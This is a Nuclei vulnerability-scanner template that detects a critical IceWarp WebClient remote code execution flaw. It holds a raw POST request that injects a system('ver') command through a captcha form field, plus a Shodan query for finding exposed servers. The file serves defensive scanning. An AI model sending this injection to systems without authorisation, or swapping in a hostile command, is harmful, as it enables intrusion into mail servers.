nuclei-templates/http/vulnerabilities/other/icewarp-webclient-rce.yaml

37 lines
792 B
YAML

id: icewarp-webclient-rce
info:
name: IceWarp WebClient - Remote Code Execution
author: gy741
severity: critical
description: |
IceWarp WebClient is susceptible to remote code execution.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
metadata:
max-request: 1
shodan-query: title:"icewarp"
tags: icewarp,rce
http:
- raw:
- |
POST /webmail/basic/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_dlg[captcha][target]=system(\'ver\')\
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Microsoft Windows [Version"
- type: status
status:
- 302